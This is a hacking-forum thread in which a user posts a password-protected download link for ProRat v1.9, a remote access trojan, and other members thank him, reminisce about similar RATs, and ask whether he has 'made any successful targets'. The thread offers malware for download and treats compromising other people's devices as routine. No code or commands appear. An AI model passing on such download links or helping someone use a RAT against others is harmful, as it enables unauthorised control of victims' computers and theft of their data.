chevron_left chevron_right
Login Register invert_colors photo_library
Thread Rating:
  • 0 Vote(s) - 0 Average

filter_list Prorat v1.9
Author
 Prorat v1.9

A RAT or remote administration tool, is software that gives a person full control a tech device, remotely. The RAT gives the user access to your system, just as if they had physical access to your device.
                                                                                     Download Link For: Prorat v1.9
                                                                                      Link: http://www.mediafire.com/file/w3j25dyo1i...9.zip/file

To Unzip The File Put The Password Below
                                                                                                                                                            Password: pro

Virus Check
                                                                                                        Link:  https://www.virustotal.com/#/file/092106.../detection

[Image: 2rhve3a.jpg]

Hope You Enjoyed! Wink
(This post was last modified: 07-14-2018, 12:29 AM by J0K3Rx.)

RE: Prorat v1.9 #2
This seems very interesting. I will be sure to check it out and see what I think. Thank you for the contribution. Smile

RE: Prorat v1.9 #3
10/10 90's graphics. Thanks for sharing this interesting tool with us. Have you made any successful targets?

RE: Prorat v1.9 #4
From memory, this tool Is over 12 years old.

Along with Poison Ivy, Optix Pro and many others release around the same time, I have a few versions of ProRat still sitting on my external HDD. In It's time, It was quite effective but I haven't touched It since.
Appreciate the contribution.
[Image: AD83g1A.png]

[+] 1 user Likes mothered's post

RE: Prorat v1.9 #5
(07-12-2018, 07:22 AM)mothered Wrote: From memory, this tool Is over 12 years old.

Along with Poison Ivy, Optix Pro and many others release around the same time, I have a few versions of ProRat still sitting on my external HDD. In It's time, It was quite effective but I haven't touched It since.

Yes bro i know that but i put the download link for people who like to download the program because the old programs are rare to find

RE: Prorat v1.9 #6
This RAT looks weird, i don't like the UI aka the design...
Discord : Skof#3013

RE: Prorat v1.9 #7
(07-12-2018, 01:12 PM)J0K3Rx Wrote:
(07-12-2018, 07:22 AM)mothered Wrote: From memory, this tool Is over 12 years old.

Yes bro i know that but i put the download link for people who like to download the program because the old programs are rare to find

And rightly so.

My post was based on Informative purposes, and not anything relative to your thread. It's been quite a while since I've seen a contribution of a tool over a decade old. Thanks for that.

RE: Prorat v1.9 #8
(07-12-2018, 03:04 PM)mothered Wrote:
(07-12-2018, 01:12 PM)J0K3Rx Wrote:

And rightly so.

My post was based on Informative purposes, and not anything relative to your thread. It's been quite a while since I've seen a contribution of a tool over a decade old. Thanks for that.

I really appreciate that

[+] 1 user Likes J0K3Rx's post

RE: Prorat v1.9 #9
I found It odd that a tool of this nature and age, had no detections In the online virus scan report.

The executable file demonstrates otherwise. I've scanned my copy, and It's much of a muchness with this contribution. In essence, due to It's age and the fact It's been community property for ex-amount of years, a high degree of detections Is expected. Do however, run It In a controlled/Isolated environment.